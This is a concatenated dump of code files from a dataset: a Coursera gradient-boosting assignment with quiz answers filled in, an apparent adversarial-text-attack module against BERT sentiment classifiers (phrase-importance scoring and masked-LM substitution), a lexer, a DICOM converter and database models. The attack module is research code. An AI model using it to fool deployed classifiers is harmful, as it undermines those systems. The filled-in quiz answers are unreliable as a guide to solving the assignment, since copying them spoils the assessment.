Quiz Question: Which loan has the highest probability of being classified as a safe loan?\n# ans = loan 4\n\n# Checkpoint: Can you verify that for all the predictions with probability >= 0.5, the model predicted the label +1?\n\n# Evaluating the model on the validation data\n# ===========================================\n\n# Recall that the accuracy is defined as follows:\n\n# 13. Evaluate the accuracy of the model_5 on the validation_data. (Hint: if you are using scikit-learn, you can use the .score() method)\nvalidation_data_without_target = validation_data.drop(target,1)\nmodel_5_accuracy = gradient_boosting_classifier.score(validation_data_without_target, validation_data[target])\n\n# 14. Calculate the number of false positives made by the model on the validation_data.\nmodel_5_predicted_valid_data = gradient_boosting_classifier.predict(validation_data_without_target)\nfalse_positive_count = 0\nfalse_negative_count = 0\nfor predict, valid in zip(model_5_predicted_valid_data, validation_data[target]):\n if valid == -1 and predict == +1:\n false_positive_count += 1\n if valid == +1 and predict == -1:\n false_negative_count += 1\n\n# Quiz question: What is the number of false positives on the validation_data?\n# ans = 1653\n\n# 15. 
Calculate the number of false negatives made by the model on the validation_data.\n# ans = 1491\n\n# Comparison with decision trees\n# ==============================\n\n# In the earlier assignment, we saw that the prediction accuracy of the decision trees was around 0.64. In this assignment, \n# we saw that model_5 has an accuracy of approximately 0.67.\n\n# Here, we quantify the benefit of the extra 3% increase in accuracy of model_5 in comparison with a single decision tree from the original \n# decision tree assignment.\n\n# As we explored in the earlier assignment, we calculated the cost of the mistakes made by the model. We again consider the same costs as follows:\n\n# - False negatives: Assume a cost of $10,000 per false negative.\n# - False positives: Assume a cost of $20,000 per false positive.\n\n# Assume that the number of false positives and false negatives for the learned decision tree was\n\n# - False negatives: 1936\n# - False positives: 1503\n\n# Using the costs defined above and the number of false positives and false negatives for the decision tree, we can calculate the total cost of the mistakes made by the \n# decision tree model as follows:\n# cost = $10,000 * 1936 + $20,000 * 1503 = $49,420,000\n\n# The total cost of the mistakes of the model is $49.42M. That is a lot of money!\n\n# 16. Calculate the cost of mistakes made by model_5 on the validation_data.\ncost = 10000*1491 + 20000*1653\n\n# Quiz Question: Using the same costs of the false positives and false negatives, what is the cost of the mistakes made by the boosted tree model \n# (model_5) as evaluated on the validation_set?\n# ans = 47970000\n\n# Reminder: Compare the cost of the mistakes made by the boosted trees model with the decision tree model. The extra 3% improvement in prediction \n# accuracy can translate to several million dollars! And, it was so easy to get by simply boosting our decision trees.\n\n# Most positive & negative loans\n# ==============================\n\n# In this section, we will find the loans that are most likely to be predicted safe. We can do this in a few steps:\n\n# - Step 1: Use the model_5 (the model with 5 trees) and make probability predictions for all the loans in validation_data.\n# - Step 2: Similar to what we did in the very first assignment, add the probability predictions as a column called predictions into validation_data.\n# - Step 3: Sort the data (in decreasing order) by the probability predictions.\n\n# 17. Start here with Step 1 & Step 2. Make predictions using model_5 for all examples in the validation_data.\nmodel_5_validation_data_prob_prediction = gradient_boosting_classifier.predict_proba(validation_data_without_target)[:,1]\nvalidation_data['predictions'] = model_5_validation_data_prob_prediction\n# Checkpoint: For each row, the probabilities should be a number in the range [0, 1].\n\n# 18. Now, we are ready to go to Step 3. You can now use the prediction column to sort the loans in validation_data (in descending order) by prediction probability. Find the top 5 loans with the highest probability of being predicted as a safe loan.\nvalidation_data = validation_data.sort_values(['predictions'], ascending=[False])\n\n# Quiz question: What grades are the top 5 loans?\n# ans = grade A\n\n# 19. Repeat this exercise to find the 5 loans (in the validation_data) with the lowest probability of being predicted as a safe loan.\nvalidation_data_safe = validation_data[validation_data['predictions'] > 0.5].sort_values(['predictions'], ascending=[True])\n\n# Effects of adding more trees\n# ============================\n\n# In this assignment, we will train 5 different ensemble classifiers in the form of gradient boosted trees.\n\n# 20. Train models with 10, 50, 100, 200, and 500 trees. Use the n_estimators parameter to control the number of trees. Remember to keep max_depth = 6.\n# Call these models model_10, model_50, model_100, model_200, and model_500, respectively. This may take a few minutes to run.\n# Compare accuracy on entire validation set\ngradient_boosting_classifier_10 = sken.GradientBoostingClassifier(max_depth=6, n_estimators=10) \ngradient_boosting_classifier_10.fit(train_data, train_target)\nmodel_10 = gradient_boosting_classifier_10.predict(validation_data_without_target)\n\ngradient_boosting_classifier_50 = sken.GradientBoostingClassifier(max_depth=6, n_estimators=50) \ngradient_boosting_classifier_50.fit(train_data, train_target)\nmodel_50 = gradient_boosting_classifier_50.predict(validation_data_without_target)\n\ngradient_boosting_classifier_100 = sken.GradientBoostingClassifier(max_depth=6, n_estimators=100) \ngradient_boosting_classifier_100.fit(train_data, train_target)\nmodel_100 = gradient_boosting_classifier_100.predict(validation_data_without_target)\n\ngradient_boosting_classifier_200 = sken.GradientBoostingClassifier(max_depth=6, n_estimators=200) \ngradient_boosting_classifier_200.fit(train_data, train_target)\nmodel_200 = gradient_boosting_classifier_200.predict(validation_data_without_target)\n\ngradient_boosting_classifier_500 = sken.GradientBoostingClassifier(max_depth=6, n_estimators=500) \ngradient_boosting_classifier_500.fit(train_data, train_target)\nmodel_500 = gradient_boosting_classifier_500.predict(validation_data_without_target)\n\n# Now we will compare the predictive accuracy of our models on the validation set.\n\n# 21. Evaluate the accuracy of the 10, 50, 100, 200, and 500 tree models on the validation_data.\nmodel_10_accuracy = gradient_boosting_classifier_10.score(validation_data_without_target, validation_data[target])\nmodel_50_accuracy = gradient_boosting_classifier_50.score(validation_data_without_target, validation_data[target])\nmodel_100_accuracy = gradient_boosting_classifier_100.score(validation_data_without_target, validation_data[target])\nmodel_200_accuracy = gradient_boosting_classifier_200.score(validation_data_without_target, validation_data[target])\nmodel_500_accuracy = gradient_boosting_classifier_500.score(validation_data_without_target, validation_data[target])\n\n# Quiz Question: Which model has the best accuracy on the validation_data?\n# ans = model_5 or model_10\n\n# Quiz Question: Is it always true that the model with the most trees will perform best on test data?\n# ans = False\n\n# Plot the training and validation error vs. number of trees\n# ==========================================================\n\n# Recall from the lecture that the classification error is defined as\n# classification error = 1 - accuracy\n\n# In this section, we will plot the training and validation errors versus the number of trees to get a sense of how these models are performing. \n# We will compare the 10, 50, 100, 200, and 500 tree models. You will need matplotlib in order to visualize the plots.\n\n# 22. 
First, make sure this block of code runs on your computer.\nimport matplotlib.pyplot as plt\n# %matplotlib inline\ndef make_figure(dim, title, xlabel, ylabel, legend):\n plt.rcParams['figure.figsize'] = dim\n plt.title(title)\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n if legend is not None:\n plt.legend(loc=legend, prop={'size':15})\n plt.rcParams.update({'font.size': 16})\n plt.tight_layout()\n \n# In order to plot the classification errors (on the train_data and validation_data) versus the number of trees, we will need lists of all \n# the errors.\n\n# Steps to follow:\n\n# - Step 1: Calculate the classification error for each model on the training data (train_data).\n# - Step 2: Store the training errors into a list (called training_errors) that looks like this: [train_err_10, train_err_50, ..., train_err_500]\n# - Step 3: Calculate the classification error of each model on the validation data (validation_data).\n# - Step 4: Store the validation classification error into a list (called validation_errors) that looks like this:[validation_err_10, validation_err_50, ..., validation_err_500]\n\n# Once that has been completed, we will give code that should be able to evaluate correctly and generate the plot.\n# 23. Let us start with Step 1. Write code to compute the classification error on the train_data for models model_10, model_50, model_100, \n# model_200, and model_500.\nmodel_10_train_accuracy = gradient_boosting_classifier_10.score(train_data, train_target)\ntrain_err_10 = commonlib.calc_classification_error(model_10_train_accuracy)\n\nmodel_50_train_accuracy = gradient_boosting_classifier_50.score(train_data, train_target)\ntrain_err_50 = commonlib.calc_classification_error(model_50_train_accuracy)\n\nmodel_100_train_accuracy = gradient_boosting_classifier_100.score(train_data, train_target)\ntrain_err_100 = commonlib.calc_classification_error(model_100_train_accuracy)\n\nmodel_200_train_accuracy = gradient_boosting_classifier_200.score(train_data, train_target)\ntrain_err_200 = commonlib.calc_classification_error(model_200_train_accuracy)\n\nmodel_500_train_accuracy = gradient_boosting_classifier_500.score(train_data, train_target)\ntrain_err_500 = commonlib.calc_classification_error(model_500_train_accuracy)\n\n# 24. Now, let us run Step 2. Save the training errors into a list called training_errors.\ntraining_errors = [train_err_10, train_err_50, train_err_100, train_err_200, train_err_500]\n\n# 27. Now, we will plot the training_errors and validation_errors versus the number of trees. We will compare the 10, 50, 100, 200, \n# and 500 tree models. We provide some plotting code to visualize the plots within this notebook.\n\nvalid_err_10 = commonlib.calc_classification_error(model_10_accuracy)\nvalid_err_50 = commonlib.calc_classification_error(model_50_accuracy)\nvalid_err_100 = commonlib.calc_classification_error(model_100_accuracy)\nvalid_err_200 = commonlib.calc_classification_error(model_200_accuracy)\nvalid_err_500 = commonlib.calc_classification_error(model_500_accuracy)\n\nvalidation_errors = [valid_err_10, valid_err_50, valid_err_100, valid_err_200, valid_err_500]\n\n# 28. 
Run the following code to visualize the plots.\nplt.plot([10, 50, 100, 200, 500], training_errors, linewidth=4.0, label='Training error')\nplt.plot([10, 50, 100, 200, 500], validation_errors, linewidth=4.0, label='Validation error')\n\nmake_figure(dim=(10,5), \n title='Error vs number of trees',\n xlabel='Number of trees',\n ylabel='Classification error',\n legend='best')\n \n# Quiz question: Does the training error reduce as the number of trees increases?\n# ans = True\n\n# Quiz question: Is it always true that the validation error will reduce as the number of trees increases?\n# ans = False", "sub_path": "python/coursera/ml_classification/week5/assignment1-exploring_ensemble_methods.py", "file_name": "assignment1-exploring_ensemble_methods.py", "file_ext": "py", "file_size_in_byte": 20476, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "pandas.read_csv", "line_number": 38, "usage_type": "call"}, {"api_name": "coursera.ml_common.commonlib.MachineLearningCommonLib", "line_number": 114, "usage_type": "call"}, {"api_name": "coursera.ml_common.commonlib", "line_number": 114, "usage_type": "name"}, {"api_name": "pandas.read_json", "line_number": 117, "usage_type": "call"}, {"api_name": "pandas.read_json", "line_number": 118, "usage_type": "call"}, {"api_name": "sklearn.ensemble.GradientBoostingClassifier", "line_number": 144, "usage_type": "call"}, {"api_name": "sklearn.ensemble", "line_number": 144, "usage_type": "name"}, {"api_name": "sklearn.ensemble.GradientBoostingClassifier", "line_number": 277, "usage_type": "call"}, {"api_name": "sklearn.ensemble", "line_number": 277, "usage_type": "name"}, {"api_name": "sklearn.ensemble.GradientBoostingClassifier", "line_number": 281, "usage_type": "call"}, {"api_name": "sklearn.ensemble", "line_number": 281, "usage_type": "name"}, {"api_name": "sklearn.ensemble.GradientBoostingClassifier", "line_number": 285, "usage_type": "call"}, {"api_name": "sklearn.ensemble", "line_number": 285, "usage_type": "name"}, {"api_name": "sklearn.ensemble.GradientBoostingClassifier", "line_number": 289, "usage_type": "call"}, {"api_name": "sklearn.ensemble", "line_number": 289, "usage_type": "name"}, {"api_name": "sklearn.ensemble.GradientBoostingClassifier", "line_number": 293, "usage_type": "call"}, {"api_name": "sklearn.ensemble", "line_number": 293, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 325, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 325, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 326, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 326, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 327, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 327, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 328, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 328, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 330, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 330, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams.update", "line_number": 331, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 331, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 331, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 332, 
"usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 332, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 377, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 377, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 378, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 378, "usage_type": "name"}]} {"seq_id": "414695017", "text": "from pprint import pprint\n\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader, SequentialSampler, TensorDataset\n\nfrom model.tokenizer import get_filtered_k_phrases, filter_unwanted_phrases\n\ndef get_phrase_masked_list(text, sorted_phrase_offsets, sorted_n_words_in_phrase):\n \"\"\"retrieve phrase masked list.\n Args:\n text [str]: original text\n sorted_phrase_offsets List[tuple(start, end), ...]: sorted offsets by importance\n sorted_n_words_in_phrase List[int]: sorted number of words in phrases\n Returns:\n phrase_masked_list: len(phrase_masked_list) == len(sorted_n_words_in_phrase)\n for each phrase in the list, 1 < len(list_of_masked_text) < n_words_in_phrase\n \"\"\"\n phrase_masked_list = []\n # this triple for loop would be super slow\n # TODO: figure a way to optimize it\n for i, (n, (start, end)) in enumerate(zip(sorted_n_words_in_phrase, sorted_phrase_offsets)):\n phrase_masked_list.append([])\n for n_mask in range(1, n+1):\n # make sure there are spaces around it\n mask_text = f\" {' '.join(['[MASK]'] * n_mask)} \"\n phrase_masked_list[i].append(text[:start] + mask_text + text[end:])\n\n return phrase_masked_list\n\n\n# return units masked with UNK at each position in the sequence\ndef get_unk_masked(text, phrase_offsets, filtered_indices):\n masked_units = []\n for i in filtered_indices:\n start, end = phrase_offsets[i]\n masked_units.append(text[:start] + '[UNK]' + text[end:])\n # list of masked basic units\n return masked_units\n\n\ndef get_important_scores(\n masked_phrases,\n tokenizer,\n target_model,\n orig_label,\n max_prob,\n orig_probs,\n device,\n batch_size=1,\n max_length=512\n):\n \"\"\"compute importance scores based on the target model\n This function takes in the tokens from the original text, and the target model,\n and compute the difference with the original probs if each token is masked with [UNK].\n Args:\n text: the original text\n phrase_offsets: a list of tuples indicating the start and end of a phrase.\n filtered_indices: a list of indices \n tokenizer: a BERT tokenizer to be used with the target model.\n target_model: a fine-tuned BERT model for sentiment analysis.\n orig_label: the original label of the text.\n max_prob: the maximum probability from the original probability output.\n orig_probs: the set of original probability outputted from the target model.\n device: the device to move around the tensors and models.\n batch_size: the batch size of the input.\n max_length: the maximum length to keep in the original text.\n Returns:\n import_scores: a torch tensor with dim (len(masked_phrases),)\n \"\"\"\n\n encoded = tokenizer(masked_phrases,\n truncation=True,\n padding='max_length',\n max_length=max_length,\n return_token_type_ids=False,\n return_tensors=\"pt\")\n\n inputs = torch.cat([encoded['input_ids'].unsqueeze(0), encoded['attention_mask'].unsqueeze(0)]).to(device)\n inputs = inputs.permute(1, 0, 2).unsqueeze(2)\n leave_1_logits = [target_model(*data).logits for data in inputs]\n\n # turn into tensor\n leave_1_logits = torch.cat(leave_1_logits, dim=0)\n leave_1_probs = 
torch.softmax(leave_1_logits, dim=-1) # dim: (len(masked_phrases), num_of_classes)\n leave_1_labels = torch.argmax(leave_1_probs, dim=-1) # dim: len(masked_phrases)\n\n import_scores = (max_prob\n - leave_1_probs[:, orig_label] # how the probability of original label decreases\n +\n (leave_1_labels != orig_label).float() # new label not equal to original label\n *\n (leave_1_probs.max(dim=-1)[0] - torch.index_select(orig_probs, 0, leave_1_labels))\n ) # probability of changed label\n\n return import_scores, leave_1_labels\n\n\ndef get_substitutes(top_k_ids, tokenizer, mlm_model, device):\n \"\"\"get_substitutes find the set of substitution candidates using perplexity.\n Limitation: due to the lack of GPU memory, we set a threshold\n Args:\n top_k_ids: top k ids from the mlm model, tensor (1, n_masks, k)\n tokenizer: Bert Tokenizer\n mlm_model: mlm model\n device: where to transfer the data\n Returns:\n candidates_list: list of list of candidates ranked by perplexity\n \"\"\"\n # all substitutes list of list of token-id (all candidates)\n c_loss = nn.CrossEntropyLoss(reduction='none')\n\n # here we need to get permutation of top k ids\n # because we have no idea what combination fits the most\n\n # assuming first dimension is 1\n #top_k_ids = top_k_ids.squeeze()\n # print(top_k_ids)\n # https://stackoverflow.com/questions/1208118\n meshgrid = [tensor.unsqueeze(0) for tensor in torch.meshgrid(*top_k_ids)]\n ids_comb = torch.cat(meshgrid).T.reshape(-1, len(top_k_ids)).unique(dim=-1) \\\n if len(top_k_ids.shape) != 1 else top_k_ids.unsqueeze(0).T\n # print(ids_comb)\n # print(top_k_ids)\n # print(ids_comb)\n\n # set a threshold\n # TODO: we should select combinations instead of this simple cut\n ids_comb = ids_comb[:24]\n\n # compute perplexity\n N, L = ids_comb.size()\n logits = mlm_model(ids_comb)[0]\n ppl = c_loss(logits.view(N*L, -1), ids_comb.view(-1))\n ppl = torch.exp(torch.mean(ppl.view(N, L), dim=-1))\n\n # sort candidates\n sorted_indices = torch.argsort(ppl)\n sorted_token_ids_list = torch.index_select(ids_comb, 0, sorted_indices).tolist()\n tokens_list = [tokenizer.convert_ids_to_tokens(tokens) for tokens in sorted_token_ids_list]\n # necessary to remove subwords\n candidates_list = [[tokenizer.convert_tokens_to_string([token]) for token in tokens] for tokens in tokens_list]\n\n return candidates_list\n\ndef get_phrase_substitutes(input_ids, attention_mask, mask_token_index, stop_words, tokenizer, mlm_model, device, beam_width=10, K=6):\n # all substitutes list of list of token-id (all candidates)\n c_loss = nn.CrossEntropyLoss(reduction='none')\n\n word_positions = len(mask_token_index)\n query_num = 0\n \n masked_logits = mlm_model(input_ids, attention_mask).logits\n query_num += len(input_ids)\n \n masked_logits = torch.index_select(masked_logits, 1, mask_token_index[0])\n \n # top_ids has a beam_width number of word combinations with smallest perplexities\n # the initial candidates are the beam_width number of words with the highest logits\n top_ids = torch.topk(masked_logits, K, dim=-1).indices[0]\n\n #_, sorted_ids = torch.sort(masked_logits[0,0], dim=-1, descending=True)\n #filtered_ids = get_filtered_k_phrases(sorted_ids, tokenizer, stop_words, K)\n\n #initialize candidates pool with the top k candidates at the first position\n candidate_ids = top_ids.T.to(device)\n \n for p in range(1, word_positions):\n new_inputs = input_ids.repeat(len(candidate_ids), 1)\n new_inputs[:, mask_token_index[:p]] = candidate_ids\n \n masked_logits = mlm_model(new_inputs, 
attention_mask).logits\n masked_logits = torch.index_select(masked_logits, 1, mask_token_index[p])\n query_num += len(new_inputs)\n \n top_ids = torch.topk(masked_logits, beam_width, dim=-1).indices\n \n repeated_cands = candidate_ids.unsqueeze(1).repeat(1, beam_width, 1).reshape(-1,p)\n repeated_new_cands = top_ids.squeeze().reshape(-1, 1)\n \n # cur_options = (beam_width, beam_width)\n cur_options = torch.cat((repeated_cands, repeated_new_cands), 1)\n \n N, L = cur_options.size()\n logits = mlm_model(cur_options)[0]\n query_num += len(cur_options)\n\n ppl = c_loss(logits.view(N*L, -1), cur_options.view(-1))\n ppl = torch.exp(torch.mean(ppl.view(N, L), dim=-1))\n\n # the smaller the perplexity, the more coherent the sequence is\n sorted_indices = torch.argsort(ppl)[:K]\n candidate_ids = torch.index_select(cur_options, 0, sorted_indices)\n \n sorted_token_ids_list = candidate_ids.tolist()\n tokens_list = [tokenizer.convert_ids_to_tokens(tokens) for tokens in sorted_token_ids_list]\n \n # necessary step to remove subwords\n candidates_list = [[tokenizer.convert_tokens_to_string([token]) for token in tokens] for tokens in tokens_list]\n \n \n return candidates_list, query_num\n\ndef get_word_substitutes(input_ids, attention_mask, mask_token_index, tokenizer, mlm_model, K=8, threshold=3.0):\n masked_logits = mlm_model(input_ids, attention_mask).logits\n masked_logits = torch.index_select(masked_logits, 1, mask_token_index)\n \n top_k_ids = torch.topk(masked_logits, K, dim=-1).indices[0]\n #print(masked_logits.shape)\n #print(top_k_ids.shape)\n #print(mask_token_index)\n substitute_scores = masked_logits[0,0][top_k_ids][0]\n substitute_ids = top_k_ids[0]\n \n words = []\n for (i, score) in zip(substitute_ids, substitute_scores):\n if threshold != 0 and score < threshold:\n break\n words.append([tokenizer._convert_id_to_token(int(i))])\n \n return words\n", "sub_path": "model/substitution.py", "file_name": "substitution.py", "file_ext": "py", "file_size_in_byte": 8847, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "torch.cat", "line_number": 79, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 84, "usage_type": "call"}, {"api_name": "torch.softmax", "line_number": 85, "usage_type": "call"}, {"api_name": "torch.argmax", "line_number": 86, "usage_type": "call"}, {"api_name": "torch.index_select", "line_number": 93, "usage_type": "call"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 111, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 111, "usage_type": "name"}, {"api_name": "torch.meshgrid", "line_number": 120, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 121, "usage_type": "call"}, {"api_name": "torch.exp", "line_number": 135, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 135, "usage_type": "call"}, {"api_name": "torch.argsort", "line_number": 138, "usage_type": "call"}, {"api_name": "torch.index_select", "line_number": 139, "usage_type": "call"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 148, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 148, "usage_type": "name"}, {"api_name": "torch.index_select", "line_number": 156, "usage_type": "call"}, {"api_name": "torch.topk", "line_number": 160, "usage_type": "call"}, {"api_name": "torch.index_select", "line_number": 173, "usage_type": "call"}, {"api_name": "torch.topk", "line_number": 176, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 182, 
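`get_word_substitutes` in the record keeps at most `K` single-token fills, stopping at the first candidate whose logit falls below `threshold`. That selection rule on its own, with toy logits and vocabulary (both assumptions):

```python
import torch

vocab = ["good", "great", "bad", "fine", "poor", "nice"]
logits = torch.tensor([4.2, 3.9, 0.5, 3.1, 0.1, 2.4])

K, threshold = 4, 3.0
scores, ids = torch.topk(logits, K)
words = []
for i, score in zip(ids, scores):
    if threshold != 0 and score < threshold:
        break  # topk is sorted, so everything after this is below threshold too
    words.append(vocab[int(i)])
print(words)  # ['good', 'great', 'fine']
```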
"usage_type": "call"}, {"api_name": "torch.exp", "line_number": 189, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 189, "usage_type": "call"}, {"api_name": "torch.argsort", "line_number": 192, "usage_type": "call"}, {"api_name": "torch.index_select", "line_number": 193, "usage_type": "call"}, {"api_name": "torch.index_select", "line_number": 206, "usage_type": "call"}, {"api_name": "torch.topk", "line_number": 208, "usage_type": "call"}]} {"seq_id": "268227681", "text": "import ply.lex as lex\n\n\ntokens = (\n\t'INTEGER',\n\t'STRING',\n\t'PLUS',\n\t'MINUS',\n\t'TIMES',\n\t'DIVIDE',\n\t'MODULO',\n\t'LPAREN',\n\t'RPAREN',\n)\n\n\nt_PLUS = r'\\+'\nt_MINUS = r'-'\nt_TIMES = r'\\*'\nt_DIVIDE = r'/'\nt_MODULO = r'%'\nt_LPAREN = r'\\('\nt_RPAREN = r'\\)'\n\nt_ignore = ' \\t\\n\\r'\n\ndef t_INTEGER(t):\n\tr'0|[1-9]\\d*'\n\tt.value = int(t.value)\n\treturn t\n\ndef t_STRING(t):\n\tr\"'(\\.|[^'])*'\"\n\tt.value = str(t.value[1:-1])\n\treturn t\n\ndef t_error(t):\n\tprint('illegal token: \"{}\"'.format(t.value[0]))\n\nlex.lex()\n\n\n", "sub_path": "lexer.py", "file_name": "lexer.py", "file_ext": "py", "file_size_in_byte": 495, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "ply.lex.lex", "line_number": 40, "usage_type": "call"}, {"api_name": "ply.lex", "line_number": 40, "usage_type": "name"}]} {"seq_id": "292851175", "text": "import binascii\nimport io\nimport os\nimport sys\nimport math\n\nimport PIL.Image\nimport pydicom\nimport numpy as np\n\nfrom shutil import copyfile\n\nerr = []\nwalk_dir = os.path.abspath(sys.argv[1])\nout_dirs = []\nfor i in range(2,len(sys.argv)):\n out_dirs.append(os.path.abspath(sys.argv[i]))\nprint('walk_dir (absolute) = ' + os.path.abspath(walk_dir))\nprint('out_dirs (absolute) = ' + str(out_dirs))\n\nfor root, subdirs, files in os.walk(walk_dir):\n print('--\\nroot = ' + root)\n\n for subdir in subdirs:\n print('\\t- subdirectory ' + subdir)\n\n for filename in files:\n file_path = os.path.join(root, filename)\n print('\\t- file %s (full path: %s)' % (filename, file_path))\n if filename.endswith('.dcm'):\n try:\n orig = pydicom.dcmread(file_path)\n pix_arr = orig.pixel_array\n img = PIL.Image.fromarray(pix_arr.astype('uint8'))\n if(img.mode == 'I;16'):\n img.mode = 'I'\n # print(img,orig)\n img = img.point(lambda i:i*(1./4)).convert('L')\n for out in out_dirs:\n fold = os.path.join(out,subdir)\n if not os.path.isdir(fold):\n os.mkdir(fold)\n pat = os.path.join(fold,filename)\n img.save(pat[:-4] + '.jpg')\n print('\\t- saved file ' + filename[:-4] + '.jpg' +\n ' (full path: ' + pat[:-4] + '.jpg' + ')')\n except NotImplementedError as e:\n print('\\t- ERROR: ' + str(e))\n err.append(str(e))\n pass\n elif filename.endswith('.jpg') or filename.endswith('jpeg'):\n for out in out_dirs:\n fold = os.path.join(out,subdir)\n if not os.path.isdir(fold):\n os.mkdir(fold)\n pat = os.path.join(fold,filename)\n copyfile(file_path,pat[:-4] + '.jpg')\n print('\\t- saved file ' + filename[:-4] + '.jpg' +\n ' (full path: ' + pat[:-4] + '.jpg' + ')')\n\nif len(err) > 0: print(err)\n", "sub_path": "dcm-jpg.py", "file_name": "dcm-jpg.py", "file_ext": "py", "file_size_in_byte": 2144, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "os.path.abspath", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 14, "usage_type": 
"attribute"}, {"api_name": "sys.argv", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 17, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "os.walk", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "pydicom.dcmread", "line_number": 32, "usage_type": "call"}, {"api_name": "PIL.Image.Image.fromarray", "line_number": 34, "usage_type": "call"}, {"api_name": "PIL.Image.Image", "line_number": 34, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 34, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path", "line_number": 43, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path", "line_number": 53, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 54, "usage_type": "call"}, {"api_name": "os.path", "line_number": 54, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path", "line_number": 56, "usage_type": "attribute"}, {"api_name": "shutil.copyfile", "line_number": 57, "usage_type": "call"}]} {"seq_id": "514537298", "text": "#!/usr/bin/env python3\n\nfrom sqlalchemy.orm import validates\nfrom sqlalchemy import Column, Integer, String\nfrom database import Base\n\n\nclass Property(Base):\n __tablename__ = \"properties\"\n id = Column(Integer, primary_key=True)\n x = Column(Integer)\n y = Column(Integer)\n beds = Column(Integer)\n baths = Column(Integer)\n squareMeters = Column(Integer)\n\n def __init__(self, x=None, y=None, beds=None, baths=None, squareMeters=None):\n self.x = x\n self.y = y\n self.beds = beds\n self.baths = baths\n self.squareMeters = squareMeters\n\n def __repr__(self):\n return \"\" % (self.id)\n\n @validates(\"x\")\n def validate_x(self, key, value):\n if 0 <= int(value) and int(value) <= 1400:\n return value\n\n raise ValueError()\n\n @validates(\"y\")\n def validate_y(self, key, value):\n if 0 <= int(value) and int(value) <= 1000:\n return value\n\n raise ValueError()\n\n @validates(\"beds\")\n def validate_beds(self, key, value):\n if 1 <= int(value) and int(value) <= 5:\n return value\n\n raise ValueError()\n\n @validates(\"baths\")\n def validate_baths(self, key, value):\n if 1 <= int(value) and int(value) <= 4:\n return value\n\n raise ValueError()\n\n @validates(\"squareMeters\")\n def validate_square_meters(self, key, value):\n if 20 <= int(value) and int(value) <= 240:\n return value\n\n raise ValueError()\n\n\nclass Province(Base):\n __tablename__ = \"provinces\"\n id = Column(Integer, primary_key=True)\n name = Column(String(30))\n ax = Column(Integer)\n ay = 
